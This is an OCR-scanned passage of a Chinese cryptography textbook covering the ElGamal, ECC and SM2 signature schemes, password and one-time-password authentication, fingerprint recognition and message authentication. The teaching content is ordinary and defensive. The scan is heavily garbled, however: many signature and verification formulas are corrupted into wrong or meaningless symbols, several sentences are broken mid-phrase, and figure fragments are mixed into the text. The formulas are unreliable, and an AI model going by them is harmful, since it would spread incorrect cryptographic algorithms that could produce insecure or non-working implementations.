设 明 文 消 息 m 加 签名 ，0<m<p-1， 其 签名 过 程 如 下 : 

® HP A 随机 地 选择 一 个 整数 k，1<k<p-1, 且 (k, p-l) =; 

回 计算 r=a* mod p; 

@ 计算 s= (m—xr) K> mod p-1; 

© R r, s) 作为 m 的 签名 ,并 以 <m，r，s> 的 形式 发 给 用 户 Bo 

3. 验证 签名 

© 用 户 B 接收 : <m，r，s>。 

© 用 户 B 用 A 的 公 钥 y 验证: a7 mod p, EBRA, ERIZANA, T 
则 签名 为 假 。 

签名 的 可 验证 性 可 证 明 如 下 : 
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因为 s= (m—xr) k mod po, 

所 以 m=xr+ks mod p-l, 

故 a =a =a (aly? mod p， 故 签名 可 验证 。 

4. 安全 性 

由 于 从 公开 密 钥 求 私 钥 是 离散 对 数 问题 ， 要 求 p- 要 有 大 素数 因子 ,否则 易 受 攻击 。 
为 了 安全 ， 随 机 数 大 应当 是 一 次 性 的 。 否 则 时 间 一 长 , 大 将 可 能 泄露 。 因 为 ， 

x=(m-ks)r mod p-l, 

如 果 知 道 了 mm， 便 可 求 出 保密 的 解密 钥 。 

此 外 如 果 磊 重复 使 用 ， 如 用 大 签名 ma Alm. Fi, 

m=xr+ksı mod p-l, 


m=xrtks mod p-l, 
于 是 ，(s1-s2)k=(m-m2) mod p-l 
如 果 知 道 了 mi 和 m2， 便 可 求 出 进而 求 出 保密 的 解密 钥 。 
由 此 可 知 ， 不 要 随便 给 别人 签名 。 不 要 直接 对 m 签名， 而 是 对 HASH(m) 签 名 。 
ElGamal 签名 有 许多 种 变型 ， 并 得 到 广泛 应 用 。 美 国 和 俄罗斯 等 国家 的 数字 签名 标 
准 算法 都 是 采用 了 ElGamal 签名 的 变型 。 
2.6.2.3 ”基本 的 ECC 签名 体制 算法 与 安全 性 
-个 椭圆 曲线 密码 由 下 面 的 六 元 组 描述 : 
T=<p, a, b, G, n, h> 
其 中 ,p 为 大 于 3 素数 ，p 确定 了 有 限 域 GF (p); R a,b EGF(p),a Ail b tire TH 
圆 曲线 ，G 为 循环 子 群 E WERI, n 为 素数 旦 为 生成 元 G 的 阶 ，G 入 n 确定 了 循环 子 
if Ey. 
yx taxth modp 
d 为 用 户 的 私 铀 ， 公 开 钥 为 点 ，Q=4G。 
1. 产生 签名 
© 选择 一 个 随机 数 k KE{1, 2, ++, n-l}; 
© 计算 点 R (xe, yr) =kG, Heid = xe: 
@ 利用 保密 的 解密 钥 d 计算 : 
s=(m—dr)k' modn ; 
@ 以 <r,s> 作 为 消息 m 的 签名 ， 并 以 <m，r，s> 的 形式 传输 或 存储 。 
2. 验证 签名 
® 计算 imod m; 
© 利用 公开 的 加 密 钥 O 计算 


iso) 
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U(xu, yu)= s (mG-rO) 
© 如 果 xu=r， 则 <r，s> 是 用 户 A 对 m WEA. 
证 明 : 因为 s=(m-4n) Kk modn， 所 以 
s'=(m-dry* kmodn 
所 以 Uv. yu) =(m—dr)* k(mG- rQ) 
=(m -dry (mkG- krdG)= (m-dr) (mR- rdR) 
=(m-dr)™ R (m-dr) =R (xr yr) 
所 以 xu =xR=F o 


2.6.3 SM2 椭圆 曲线 数字 签名 算法 


国家 密码 管理 局 公布 的 SM2 椭圆 曲线 公 钥 密码 算法 中 的 第 2 部 分 ， 定 义 了 SM2 Hi 
圆 曲 线 数字 签名 算法 。 

1. 参数 选择 

基本 的 椭圆 曲线 系统 参数 包括 有 限 域 Fa 的 规模 q( 当 g=2” 时 ， 还 包括 元 素 表示 法 的 
标识 和 约 化 多 项 式 )， 定 义 椭圆 曲线 EF) 的 方程 的 两 个 元 素 a、b EF; E(Fy) 上 的 基点 
G=(xGyG)(G#O)， 其 中 xG 和 yG 是 Fy 中 的 两 个 元 素 ; G 的 阶 n 及 其 他 可 选项 (如 的 余 
因子 hh 等 )。 

用 户 A 的 密 钥 对 包括 其 私 钥 da MAH Ps=[44]G= (x4.y4)。 作 为 签名 者 的 用 户 A 
具有 长 度 为 entlenA 比特 的 可 辨别 标识 IDA， 记 ENTLA 是 由 整数 entlen4 转换 而 成 的 
两 个 字 节 ， 在 该 部 分 规定 的 椭圆 曲线 数字 签名 算法 中 ， 签 名 者 和 验证 者 都 需要 用 密码 
杂凑 函数 求 得 用 户 A 的 杂凑 值 Z4。 将 椭圆 曲线 方程 参数 a. b. G 的 坐标 xG. yG 
和 PA 的 坐标 x4、y4 的 数据 类 型 转换 为 比特 串 ，Z4=F256(ENTLA1IDA1al2lxcllzyG 
|| x4 || yA). 

2. 产生 签名 

设 待 签名 的 消息 为 M, 为 了 获取 消息 M 的 数字 签名 (9)， 如 图 2-38 所 示 ， 作 为 签名 
者 的 用 户 A 应 实现 以 下 运算 步骤 : 

© #M'=Z,||M, 

© HH e=A(M’), H e 的 数据 类 型 转换 为 整数 ; 

© 用 随机 数 发 生 器 产生 随机 数 k E[1,n-1]; 

@ HARMER A CvG, H x 的 数据 类 型 转换 为 整数 ; 

® 计算 一 (e+xz mod n, 47 r=0 BK r+k=n 则 返回 Step 3; 

© wt s=(1+ds)"-(k-r-d,)) modn, # s=0 则 返回 Step 3; 

© 将 r、s 的 数据 类 型 转换 为 字 节 串 ， 消 息 M 的 签名 为 (1,s)。 
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用 户 A 的 原始 数据 


(椭圆 曲线 系统 参数 、Z4、M、Ps、d3) 


1 


@ 置 NM=ZM 


1 


@ tH e=H, 0) 


! 


© 产生 随机 数 kE[1, n-1] 


1 


® 计算 椭圆 线 点 (1, 70- 内 G 


| 


© 计算 =(e+m)mod n 


1a 


© HE s—((1+d,)'6(&-rad,))mod n 


D 确定 数字 签名 0 s) 


1 


输出 消息 M 及 其 数字 签名 (rs) 


图 2-38 SM2 椭圆 曲线 密码 签名 产生 过 程 


为 了 检验 收 到 的 消息 M' 及 其 数字 签名 (…s")， 如 图 2-39 所 示 ， 作 为 验证 者 的 用 户 B 
应 实现 以 下 运算 步骤 ; 
O 检验 xr'e[1,n-1] 是 否 成 立 ， 若 不 成 立 则 验证 不 通过 ; 
© 检验 s'Ee[1,n-1] 是 否 成 立 ， 若 不 成 立 则 验证 不 通过 ; 
© Ë MZ | AM; 
@ 计算 e'= (M1)， 将 e 的 数据 类 型 转换 为 整数 ; 

将 六 的 数据 类 型 转换 为 整数 ， 计 算 t = (rs') mod n， 若 t+ = 0， 则 验证 不 


a | 
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用 户 B 的 原始 数据 
(椭圆 曲线 系统 参数 、Z4、 Pa M'a (r. 5‘) 


@ a 11] 是 否 成 立 


@ Ése, n-1] 是 否 成 立 


=e 


© =| Z,\|M' 


a =H) 


ae 计算 (r+s')mod n 


| 


© 计算 椭圆 曲线 点 
Gir) + 


© 计算 at +x')modn 


FH 


验证 通过 验证 不 通过 


图 2-39 SM2 椭圆 曲线 密码 签名 验证 过 程 


© 计算 椭圆 曲线 点 (i y1' =[s' 1G + [Pa 
© 将 志 的 数据 类 型 转换 为 整数 ， 计 算 RR=(e'+x1') modn， 检 验 R=r' 是 否 成 立 ， 若 
成 立 则 验证 通过 ; 否则 验证 不 通过 。 
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2.7 ”认证 


2.7.1 认证 的 概念 


认证 (Authentication〉 又 称 鉴别 或 确认 ， 它 是 证 实 某 事 是 否 名 副 其 实 或 是 否 有 效 的 
一 个 过 程 。 

认证 和 加 密 的 区 别 在 于 : 加 密 用 以 确保 数据 的 保密 性 ， 阻 止 对 手 的 被 动 攻 击 ， 如 截 
取 ， 窃 听 等 ， 而 认证 用 以 确保 报 文 发 送 者 和 接收 者 的 真实 性 以 及 报 文 的 完整 性 ， 阻 止 对 
手 的 主动 攻击 ， 如 冒充 、 算 改 、 重 播 等 。 认 证 往往 是 许多 应 用 系统 中 安全 保护 的 第 一 道 
设防 ， 因 而 极为 重要 。 

认证 的 基本 思想 是 通过 验证 称谓 者 (人 或 事 ) 的 一 个 或 多 个 参数 的 真实 性 和 有 效 性 ， 
来 达到 验证 称谓 者 是 否 名 副 其 实 的 目的 〈 见 图 2-40)。 这 样 ， 就 要 求 验 证 的 参数 和 被 认 
证 的 对 象 之 间 存 在 严格 的 对 应 关系 ， 理 想 情 况 下 这 种 对 应 关系 应 是 唯一 的 。 


待 认 证 人 或 事 人 或 事 为 真 


人 或 事 为 假 


图 2-40 认证 原理 


认证 系统 常用 的 参数 有 口令 、 标 识 符 、 密 钥 、 信 物 、 智 能 卡 、 指 纹 、 视 网 纹 等 。 对 
于 那些 能 在 长 时 间 内 保持 不 变 的 参数 〈 非 时 变 参数 ) 可 采用 在 保密 条 件 下 预先 产生 并 存 
储 的 位 模式 进行 认证 , 而 对 于 经 常 变化 的 参数 则 应 适时 地 产生 位 模式 , 再 对 此 进行 认证 。 

一 般 说 来 ， 利 用 人 的 生理 特征 参数 进行 认证 的 安全 性 高 ， 但 技术 要 求 也 高 ， 至 今 尚 
未 普及 。 目 前 广泛 应 用 的 还 是 基于 密码 的 认证 技术 。 

认证 和 数字 签名 技术 都 是 确保 数据 真实 性 的 措施 ， 但 两 者 有 着 明显 的 区 别 。 

A) 认证 总 是 基于 某 种 收发 双方 共享 的 保密 数据 来 认证 被 鉴别 对 象 的 真实 性 ， 而 数 
字 签 名 中 用 于 验证 签名 的 数据 是 公开 的 。 

(2) 认证 允许 收发 双方 互相 验证 其 真实 性 ， 不 准许 第 三 者 验证 ， 而 数字 签名 允许 收 
发 双方 和 第 三 者 都 能 验证 。 

(3) 数字 签名 具有 发 送 方 不 能 抵赖 、 接 收 方 不 能 伪造 和 具有 在 公证 人 前 解决 纠纷 的 
能 力 ， 而 认证 则 不 一 定 具 备 。 

如 果 收 发 双方 都 是 诚实 的 ， 那 么 仅 有 认证 就 足够 了 。 利 用 认证 技术 收发 双方 可 以 验 
证 对 方 的 真实 性 和 报 文 的 真实 性 、 完 整 性 。 但 因 他 们 双方 共享 保密 的 认证 数据 ， 如 果 接 
收 方 不 诚实 ， 则 他 便 可 以 伪造 发 送 方 的 报 文 ， 且 发 送 方 无 法 和 争辩， 同样 ， 发 送 方 也 可 抵 


Ea 加 
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赖 其 发 出 的 报 文 ， 且 接收 方 也 无 法 争辩 。 由 于 接收 方 可 以 伪造 ， 发 送 方 能 够 抵赖 ， 因 此 
第 三 者 便 无 法 仲裁 。 


2.7.2 身份 认证 


用 户 的 身份 认证 是 许多 应 用 系统 的 第 一 道 防线 ， 其 目的 在 于 识别 用 户 的 合法 性 ， 从 
而 阻止 非法 用 户 访问 系统 。 身 份 识别 对 确保 系统 和 数据 的 安全 保密 是 极其 重要 的 ， 可 以 
通过 验证 用 户 知道 什么 、 用 户 拥 有 什么 或 用 户 的 生理 特征 等 方法 来 进行 用 户 身份 认证 。 
2.7.2.1 口令 认证 

口令 是 接收 双方 预先 约定 的 秘密 数据 ， 它 用 来 验证 用 户 知道 什么 。 口 令 验 证 的 安全 
性 虽然 不 如 其 他 几 种 方法 ， 但 是 口令 验证 简单 易 行 ， 因 此 口令 验证 是 目前 应 用 最 为 广泛 
的 身份 认证 方法 之 一 。 在 计算 机 系统 中 ， 操 作 系统 、 网 络 、 数 据 库 都 采用 了 口令 验证 。 

在 一 些 简单 的 系统 中 ， 用 户 的 口令 以 口令 表 的 形式 存储 。 当 用 户 要 访问 系统 时 ， 系 
统 要 求 用 户 提供 其 口令 ， 系 统 将 用 户 提供 的 口令 与 口令 表 中 存储 的 相应 用 户 的 口令 进行 
比较 ， 若 相等 则 确认 用 户 身份 有 效 ， 和 否则 确认 用 户 身份 无 效 ， 拒 绝 访问 。 

但 是 ， 在 上 述 口令 验证 机 制 中 ， 存 在 下 列 一 些 问题 : 

CL) 攻击 者 可 能 从 口令 表 中 获取 用 户口 令 。 因 为 用 户 的 口令 以 明文 形式 存储 在 系统 
中 ， 系 统管 理 员 可 以 获得 所 有 口令 ， 攻 击 者 也 可 利用 系统 的 漏洞 来 获得 他 人 的 口令 。 

(2) 攻击 者 可 能 在 传输 线路 上 截获 用 户口 令 。 因 为 用 户 的 口令 在 用 户 终端 到 系统 的 
线路 上 以 明文 形式 传输 ， 所 以 攻击 者 可 在 传输 线路 上 截获 用 户口 令 。 

(3) 用 户 和 系统 的 地 位 不 平等 。 这 里 只 有 系统 强制 性 地 验证 用 户 的 身份 ， 而 用 户 无 
法 验证 系统 的 身份 。 

下 面 给 出 几 种 改进 的 口令 验证 机 制 。 

1. 利用 单 向 函数 加 密 口令 

在 这 种 验证 机 制 中 ， 用 户 的 口令 在 系统 中 以 密 文 的 形式 存储 ， 并 且 对 用 户口 令 的 加 
密 应 使 得 从 口令 的 密 文 恢复 出 口令 的 明文 在 计算 上 是 不 可 行 的 。 也 就 是 说 ， 口 令 一 旦 加 
密 ， 将 永 不 可 能 以 明文 形式 在 任何 地 方 出 现 。 这 就 要 求 对 口令 加 密 的 算法 是 单 向 的 ， 即 
只 能 加 密 ， 不 能 解密 。 用 户 访问 系统 时 提供 其 口令 ， 系 统 对 该 口令 用 单 向 函数 加 密 ， 并 
与 存储 的 密 文 相 比较 。 若 相等 ， 则 确认 用 户 身份 有 效 ， 否 则 确认 用 户 身份 无 效 。 

2. 利用 数字 签名 方法 验证 口令 

在 这 种 验证 机 制 中 ， 用 户 i 将 其 公 钥 提 交 给 系统 ， 作 为 验证 口令 的 数据 ， 系 统 为 每 
个 用 户 建立 一 个 时 间 标 志 ZT (如 访问 次 数 计数 器 )， 用 户 访问 系统 时 将 其 签名 信息 

TDiID( (QD:, Ni)» Kai) 
提供 给 系统 ， 其 中 Ni 表示 本 次 访问 是 第 Ni 次 访问 。 系 统 根 据 明 文 形式 的 标识 符 ID; 
H Ka， 并 计算 


应 


E(D (D:N); Kai)» Ker =< ID; N; > 
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当 且 仅 当 ID ID; , NTH 时 系统 才 确 认 用 户 身份 有 效 。 

在 这 种 方法 中 ， 口 令 是 用 户 的 保密 的 解密 密 钥 Ka ， 它 不 存储 于 系统 中 ， 所 以 任何 
人 都 不 可 能 通过 访问 系统 而 得 到 ; 虽然 Ka 存储 于 系统 中 ， 但 是 由 Ka 不 能 推出 Ka; 由 
于 从 终端 到 系统 的 通道 上 传输 的 是 签名 数据 而 不 是 Ka 本 身 ， 所 以 攻击 者 也 不 能 通过 截 
取 获 得 ; 由 于 系统 为 每 用 户 设置 了 时 间 标 志 To BHN TH 是 才 接 收 访问 ， 所 以 可 

3. 口令 的 双向 验证 

仅仅 只 有 系统 验证 用 户 的 身份 ， 而 用 户 不 能 验证 系统 的 身份 ， 是 不 全 面 的 ， 也 是 不 
平等 的 。 为 了 确保 安全 保密 ， 用 户 和 系统 应 能 相互 平等 的 验证 对 方 的 身份 。 

WA AB 是 一 对 平等 的 实体 , 在 他 们 通信 之 前 , 必须 对 对 方 的 身份 进行 验证 ,为 此 ， 
他 们 应 事先 约定 并 共享 对 方 的 口令 。 设 A 的 口令 为 PB，B 的 口令 为 PB。 当 A 要 求 与 B 
通信 时 ，B 必须 验证 A 的 身份 ， 因 此 A 应 当 首先 向 B 出 示 表 示 自 己 身份 的 数据 。 但 此 
时 A 尚未 对 B 的 身份 进行 验证 ， 所 以 A 不 能 直接 将 自己 的 口令 发 给 B。 如 果 B 要 求 与 
A 通信 也 存在 同样 的 问题 。 

为 了 解决 这 一 问题 ， 实 现 口 令 的 双向 对 等 验证 ， 可 选择 一 个 单 向 函数 J。 假 定 A 要 
求 与 B 通 信 ， 则 A 和 B 可 如 下 相互 认证 对 方 的 身份 : 

© A>B: Ra 

@ BA: /Ps|| RA Re 

®© A+B: flPall Rs) 

A 首先 选择 随机 数 P 并 发 送 给 B。B 收 到 Ps 后， 产生 随机 数 Re， 利 用 单 向 函数 
对 其 口令 P 和 随机 数 Pa 进行 加 密 .FCPs|P0)， 并 连同 Rs 一 起 发 送 给 A。A 利用 单 向 函数 
了 对 自己 保存 的 Ps 和 Ps 进行 加 密 ， 并 与 接收 到 的 了 (Po || P4) 进 行 比较 。 若 两 者 相等 ， 则 
A MA B 的 身份 是 真实 的 ， 否 则 认为 B 的 身份 是 不 真实 的 。 然后 A 利用 单 向 函数 1 对 其 
口令 Pa 和 随机 数 Re 加密 后 发 送 给 B。B 利用 单 向 函数 1 对 自己 保存 的 Pa 和 Rs 进行 加 密 ， 
并 与 接收 到 的 了 (PsllRs) 进 行 比较 。 若 两 者 相等 ， 则 B 确认 A 的 身份 是 真实 的 ,否则 认为 
A 的 身份 是 不 真实 的 。 

由 于 f 是 单 向 函数 ， 即 使 知道 RPy| Ra) 和 Py 也 不 能 计算 出 PJ， 即 使 知道 RPs|| Re) 
和 Rs 也 不 能 计算 出 Pp， 所 以 在 上 述 口令 验证 机 制 中 ， 即 使 有 一 方 是 假冒 者 ， 他 也 不 能 
骗 得 对 方 的 口令 。 为 了 阻止 重播 攻击 ， 可 在 f (Pall PAM fP Ra) 中 加 入 时 间 性 参量 。 

4. 一 次 性 口令 

为 了 安全 ， 口 令 应 当 能 够 更 换 ， 而 且 口 令 的 使 用 周期 越 短 对 安全 越 有 利 ， 最 好 是 一 
个 口令 只 使 用 一 次 ， 即 一 次 性 口令 。 实现 一 次 性 口令 的 方法 有 很 多 。 利 用 DES 等 强 密码 
算法 可 实现 一 次 性 口令 。 系 统 产生 一 个 随机 数 R， 并 对 其 加 密 得 到 ER, K, JP ER, 
玉 ) 提 供给 用 户 ， 用 户 计 算 E(D (E BR， 局， 有 +1， 司 ， 并 将 计算 值 回 送 给 系统 。 同 时 系 
统计 算 R 十 1。 系 统 将 用 户 返 回 的 值 与 系统 自身 计算 的 值 进行 比较 ,车 两 者 相等 ， 则 系统 
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认为 用 户 的 身份 为 真 。 在 这 种 方法 中 ， 系 统 和 用 户 必 须 持 有 相同 的 密 钥 。 
利用 单 向 函数 也 可 实现 一 次 性 口令 。 设 A 和 B 要 进行 通信 ，A 选择 随机 数 x， 并 
计算 


yout” (x) (2-62) 

其 中 f 是 单 向 函数 。A 将 yo 发 送 给 B 作为 验证 口令 的 数据 。 因 为 是 单 向 函数 ， 所 
以 对 yo 不 需 保密 。A 以 

yf" 0) (0<i<n) (2-63) 

作为 其 第 i 次 通信 的 口令 发 送 给 B。B 计算 f (yi) 并 验证 是 否 等 于 yi, AHS, Il 
确认 A 的 身份 是 真实 的 ， 否则 可 知 A 的 身份 是 不 真实 的 ， 并 中 断 通信 。 显 然 ， 这 种 认证 
方式 共有 mn 个 不 同 的 口令 。 

口令 的 产生 可 以 由 用 户 自 己 选择 ， 也 可 以 由 计算 机 产生 ， 还 可 以 由 用 户 自己 选择 辅 
以 计算 机 检测 ， 或 由 计算 机 产生 而 由 用 户 选择 。 用 户 自己 选择 口令 ， 简 单方 便 ， 且 容易 
记忆 ， 但 随机 性 差 。 用 户 习惯 地 喜欢 选用 与 自己 相关 的 一 些 事物 名 ， 如 姓名 、 生 日 、 宠 
物 名 等 作 口 令 。 用 计算 机 产生 口令 随机 性 好 ， 但 用 户 不 容易 记 住 。 目 前 许多 计算 机 系统 
采用 由 用 户 选择 辅 以 计算 机 检测 方式 确定 口令 。 在 UNIX 系统 中 ， 口 令 被 加 密 转 换 为 11 
个 可 打印 字符 。 为 了 区 分 不 同 用 户 的 相同 口令 ， 系 统 自动 增加 两 个 与 时 间 及 进程 标识 符 
有 关 的 字符 。VAX 的 VMS 系统 随机 产生 5 个 口令 , 由 用 户 选择 其 中 之 一 。IBM 的 MVS 
系统 拒绝 接收 最 近 使 用 过 的 口令 。 

-个 好 的 口令 应 当 具 备 : 

a) 应 使 用 多 种 字符 ”如 同时 字母 、 数 字 、 标 点 和 控制 符 等 。UNIX 系统 在 用 户 选 
择 口 令 时 ， 如 果 发 现 用 户 给 出 的 口令 不 同时 包含 字母 和 数字 ， 或 口令 是 用 户 名 的 某 种 组 
合 ， 就 拒绝 接收 口令 。 

(2) 应 有 足够 的 长 度 一 般 取 6 到 10 个 字符 为 宜 。 在 许多 系统 中 用 户 选择 的 口令 长 
度 不 够 时 ， 系 统 拒绝 接收 。 

(3) 应 尽量 随机 不 要 选择 一 些 与 自己 相关 的 人 名 、 地 名 、 生 日 等 ， 最 好 也 不 要 选 
择 字典 中 的 单词 。 

(4) 应 定期 更 换 经常 更 换 口令 有 利于 安全 ， 但 经 常 更 换 口令 是 件 十 分 麻烦 的 事 。 
基于 System V 的 UNIX 系统 使 用 了 口令 时 效 机 制 。 口 令 的 时 效 机 制 强迫 用 户 在 指定 的 最 
长 时 间 期 限 内 更 换 口 令 。 口 令 时 效 机 制 还 有 一 个 最 短 时 间 限 制 ， 一 个 口令 只 有 使 用 的 时 
间 超 过 了 这 个 最 短 时 间 限 制 才 允 许 更 换 。 而 且 这 个 最 短 时 间 限 制 可 以 设 为 0， 这 样 可 随 
时 更 换 口 令 。 
2.7.2.2 ”生物 特征 识别 

现行 的 许多 计算 机 系统 中 ， 包 括 许多 非常 机 密 的 系统 ， 都 是 使 用 “用 户 D+ 口令 ” 
的 方法 来 进行 用 户 的 身份 认证 和 访问 控制 的 。 实 际 上 ， 这 些 方案 隐 含 着 一 些 问题 ， 如 
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令 容 易 被 遗忘 ， 有 关机 构 的 调查 表明 ,因为 遗忘 口 令 而 产生 的 问题 已 经 成 为 开 厂 商 售后 
民 务 的 最 常见 问题 之 一 ; 口令 也 容易 被 别人 窃取 ， 盗 取 者 通过 观察 用 户 在 计算 机 终端 前 
输入 口令 时 的 击 键 动作 就 可 知道 用 户口 令 ， 甚 至 可 以 通过 用 户 的 生日 、 年 龄 、 姓 名 或 者 
其 他 一 些 信息 猜 出 口令 。 众 所 周知 ， 高 度 机 密 的 美国 一 些 军 事 机 构 计算 机 网 络 曾 不 止 一 
次 被 黑客 侵入 ,黑客 们 实际 上 就 是 从 破解 这 些 计 算 机 网 络 的 某 一 合法 用 户 的 口令 开始 的 。 
尽管 现行 系统 通过 要 求 用 户 及 时 改变 他 们 的 口令 来 防止 盗用 口令 行为 ， 但 这 种 方法 不 但 
增加 了 用 户 的 记忆 负担 ， 也 不 能 从 根本 上 解决 问题 。 

通过 识别 用 户 的 生理 特征 来 认证 用 户 的 身份 是 安全 性 极 高 的 身份 认证 方法 。 把 人 体 
特 证 要 用 于 身份 识别 ， 则 它 应 具有 不 可 复制 的 特点 ， 必 须 具 有 唯一 性 和 稳定 性 。 研 究 和 
经 验 表 明 ， 人 的 指纹 、 掌 纹 、 面 孔 、 发 音 、 虹 膜 、 视 网 膜 、 骨 架 等 都 具有 唯一 性 和 稳定 
性 的 特征 , 即 每 个 人 的 这 些 特征 都 与 别人 不 同 且 终生 不 变 , 因此 可 以 据 此 进行 身份 识别 。 
基于 这 些 特 征 ， 人 们 发 展 了 指纹 识别 、 视 网 膜 识 别 、 发 音 识 别 等 多 种 生物 识别 技术 ， 其 
中 指纹 识别 技术 更 是 生物 识别 技术 的 热点 。 

指纹 识别 技术 的 利用 可 以 分 为 两 类 , 即 验证 (Verification) 和 辨识 (dentification)。 验 证 
就 是 通过 把 一 个 现场 采集 到 的 指纹 与 一 个 已 经 登记 的 指纹 进行 匹配 来 确认 身份 的 过 程 。 
首先 ， 用 户 指 纹 必 须 在 指纹 库 中 已 经 注册 。 指 纹 以 一 定 的 压缩 格式 存 贮 ， 并 与 用 户 姓名 
或 标识 联系 起 来 。 在 匹配 时 ， 先 验证 其 标识 ， 再 通过 系统 的 指纹 与 现场 采集 的 指纹 进行 
比 对 来 证 明 其 合法 。 它 回答 了 这 样 一 个 问题 :“ 他 是 他 自称 的 这 个 人 吗 ? ”图 2-41 给 出 
了 指纹 登记 与 验证 的 原理 。 
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图 2-41 指纹 登记 与 验证 原理 
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辨识 则 是 把 现场 采集 到 的 指纹 同 指纹 数据 库 中 的 指纹 逐一 对 比 ， 从 中 找 出 与 现场 指 
纹 相 匹配 的 指纹 。 辨 识 主要 应 用 于 犯罪 指纹 匹配 的 传统 领域 中 。 一 个 不 明 身 份 的 人 的 指 
纹 与 指纹 库 中 有 犯罪 记录 的 人 指纹 进行 比 对 ， 来 确定 此 人 是 否 曾经 有 过 犯罪 记录 。 辨 识 
其 实 是 回答 了 这 样 一 个 问题 :“ 他 是 谁 ? ”图 2-42 给 出 了 指纹 登记 与 辨识 原理 。 
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图 2-42 ”指纹 登记 与 辨识 原理 


由 于 计算 机 处 理 指纹 时 ， 只 涉及 了 指纹 的 一 些 有 限 的 信息 ， 而 且 比 对 算法 并 不 是 精 
确 匹 配 ， 其 结果 也 不 能 保证 100% 准 确 。 指 纹 识别 系统 的 重要 衡量 标志 是 识别 率 ， 它 主 
要 由 拒 判 率 和 误 判 率 两 部 分 组 成 。 拒 判 是 指 某 指纹 是 用 户 的 指纹 而 系统 却说 不 是 。 误 判 
是 指 ， 某 指纹 不 是 用 户 的 指纹 而 系统 却说 是 。 显 然 误 判 比 拒 判 对 安全 的 危害 更 大 ， 拒 判 
率 是 系统 易 用 性 的 重要 指标 ， 它 与 误 判 率 成 反比 。 由 于 拒 判 率 和 误 判 率 是 相互 矛盾 的 ， 
这 就 使 得 在 应 用 系统 的 设计 中 ， 要 权衡 易 用 性 和 安全 性 。 一 种 有 效 的 办 法 就 是 比 对 两 个 
或 更 多 的 指纹 ， 从 而 在 不 损失 易 用 性 的 同时 ， 提 高 系统 安全 性 。 

尽管 指纹 识别 系统 存在 着 可 靠 性 问题 ， 但 其 安全 性 比 相同 可 靠 性 级 别 的 “用 户 ID+ 
口令 ”方案 的 安全 性 高 得 多 。 例 如 采用 四 位 数字 口令 的 系统 ， 不 安全 概率 为 0.01%。 与 
采用 误 判 率 为 0.01% 指 纹 识别 系统 相 比 ， 口 令 系统 更 不 安全 ， 因 为 在 一 段 时 间 内 攻击 者 
可 以 试用 所 有 可 能 的 口令 , 但 是 他 不 可 能 找到 一 千 个 人 去 为 他 把 所 有 的 手指 (十 个 手指 》 
都 试 一 遍 。 
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指纹 识别 技术 可 以 通过 几 种 方法 应 用 到 许多 方面 。 把 指纹 识别 技术 同 IC 卡 结合 起 
来 , 是 目前 最 有 前 景 的 方向 之 一 。 该 技术 把 持 卡 人 的 指纹 加 密 后 存储 在 IC 卡 上 ,并 在 读 
卡 机 上 加 装 指纹 识别 系统 ， 通 过 比 对 卡 上 的 指纹 与 持 卡 者 的 指纹 就 可 以 确认 持 卡 者 的 是 
和 否 卡 的 真正 主人 ， 从 而 进行 下 一 步 的 交易 。 在 更 加 严格 的 场合 ， 还 可 以 进一步 同 后 台 主 
机 系统 数据 库 上 的 指纹 作 比 较 。 


2.7.3 报 文 认证 


但 在 网 络 环境 中 ， 攻 击 者 可 进行 以 下 攻击 : 

CL) 冒充 发 送 方 发 送 一 条 报 文 ; 

(2) 冒充 接收 方 发 送 收 到 或 未 收 到 报 文 的 应 答 ; 

(3) 插入 、 删 除 或 修改 报 文 内 容 

(4) 修改 报 文 顺序 (插入 报 文 、 删 除 报 文 或 重 排 序 ) 以 及 延 时 或 重播 报 文 。 

因此 ， 报 文 认证 必须 使 通信 方 能 够 验证 每 份 报 文 的 发 送 方 、 接 收 方 、 内 容 和 时 间 性 
的 真实 性 和 完整 性 。 也 就 是 说 ， 通 信 方 能 够 确定 : 

(1) 报 文 是 由 意 定 的 发 送 方 发 出 的 ; 

(2) 报 文 传送 给 意 定 的 接收 方 ; 

G) 报 文 内 容 有 无 算 改 或 发 生 错误 ; 

(4) 报 文 按 确定 的 次 序 接收 。 
2.7.3.1 ” 报 文 源 的 认证 

若 采 用 传统 密码 ， 报 文 源 的 认证 可 通过 收发 双方 共享 的 保密 的 数据 加 密 密 钥 来 实 
现 。 设 A 为 报 文 的 发 送 方 ,简称 为 源 ，B 为 报 文 的 接收 方 ， 简 称 为 宿 。A 和 B 共享 保密 
WEH Kso A 的 标识 为 Ds， 要 发 送 的 报 文 为 M， 那 么 B 认证 A 的 过 程 如 下 : 

A 一 B: E(ID4\|M, Ks) 
为 了 使 了 B 能 认证 A, A 在 发 给 B 的 每 份 报 文中 都 增加 标识 IDs, 然后 用 Ks 加 密 并 发 


给 B。 
B 收 到 报 文 后 用 Rs 解密 ， 若 解密 所 得 的 发 送 方 标识 与 IDP4 相同, 则 B 认为 报 文 是 A 
发 来 的 。 
若 采 用 公开 密 钥 密码 ， 报 文 源 的 认证 将 变 得 十 分 简单 。 只 要 发 送 方 对 每 一 报 文 进行 
数字 签名 ， 接 收 方 验证 签名 即 可 : 
A 一 B: DUDsIM, Kas) 


2.7.3.2” 报 文 宿 的 认证 
只 要 将 报 文 源 的 认证 方法 稍 加 修改 便 可 使 报 文 的 接收 方 能 够 认证 自己 是 否 是 意 定 
的 接收 方 。 这 只 要 在 以 密 钥 为 基础 的 认证 方案 的 每 份 报 文中 加 入 接收 方 标识 符 IDe: 
A—B: EUDslIM, Ks) 
车 采用 公开 密 钥 密码 ， 报 文 宿 的 认证 也 将 变 得 十 分 简单 。 只 要 发 送 方 对 每 份 报 文 用 


ai 


Ep 
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B 的 公开 的 加 密 密 钥 进行 加 密 即 可 。 只 有 B 才能 用 其 保密 的 解密 密 钥 还 原 报 文 ， 因 此 ， 
若 还 原 的 报 文 是 正确 的 ， 则 B 便 确 认 自 己 是 意 定 的 接收 方 : 
A~B: E(IDs||M, Kes) 


2.7.3.3 ” 报 文 内 容 的 认证 

报 文 内 容 认 证 使 接收 方 能 够 确认 报 文 内 容 的 真实 性 ， 这 可 通过 验证 认证 码 
(Authentication Code) 的 正确 性 来 实现 。 产 生 认证 码 的 方法 有 三 种 : 

1. 报 文 加 密 

在 这 种 方法 中 ， 整 个 报 文 的 密 文 作为 认证 码 。 如 在 传统 密码 中 ， 发 送 方 A 要 发 送 报 
文 给 接收 方 B， 则 A 用 他 们 共享 的 秘密 钥 K 对 发 送 的 报 文 M 加 密 后 发 送 给 B: 


A>B: EM, K) 
该 方法 可 以 提供 : 
。 报 文 秘密 性 : 如 果 只 有 A 和 B 知道 密 钥 KK, 那么 其 他 任何 人 均 不 能 恢复 出 报 文明 
Mo 


